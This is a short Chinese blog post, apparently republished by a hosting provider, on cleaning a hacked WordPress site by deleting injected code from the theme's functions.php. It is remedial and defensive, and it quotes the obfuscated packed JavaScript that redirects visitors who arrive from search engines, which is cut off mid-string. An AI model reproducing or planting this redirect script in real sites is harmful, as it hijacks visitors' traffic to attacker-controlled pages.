WordPress被掛馬及清除木馬代碼方法

我有個(gè)用wordpress搭建的CMS網(wǎng)站前些日子被瀏覽器報(bào)受攻擊了，谷歌的網(wǎng)站管理也工具也提示，還給出了可疑代碼和受影響的文章的地址，以前被攻擊的經(jīng)歷，那次與這次不同，只是掛了幾個(gè)黑鏈，這次不同，因此只能手動(dòng)找代碼清除了，剛開始網(wǎng)上搜了搜相關(guān)事例，有些博主是在數(shù)據(jù)庫里清除的，但我的行不通，因?yàn)槲业膯栴}不在數(shù)據(jù)庫，而在functions.php文件。

清除wordpress掛馬代碼：

1.先是登陸谷歌網(wǎng)站管理工具，在“故障診斷”下選擇“惡意軟件”進(jìn)入存在問題的網(wǎng)址，隨便點(diǎn)擊一個(gè)有問題的網(wǎng)站，谷歌網(wǎng)站管理員工具就會(huì)給出“可疑的植入代碼”

<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&(q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|

注：不要在瀏覽器中執(zhí)行！

2.在被掛馬博客當(dāng)前主題的functions.php文件中的，找到與谷歌網(wǎng)站管理員工具給出的可疑的植入代碼相同的代碼，然后把整個(gè)php語句刪除掉，我找到的整句代碼如下：（藍(lán)色部分）

3.然后保存文件。

本文出自：億恩科技【1tcdy.com】

服務(wù)器租用/服務(wù)器托管中國五強(qiáng)！虛擬主機(jī)域名注冊(cè)頂級(jí)提供商！15年品質(zhì)保障！--億恩科技[ENKJ.COM]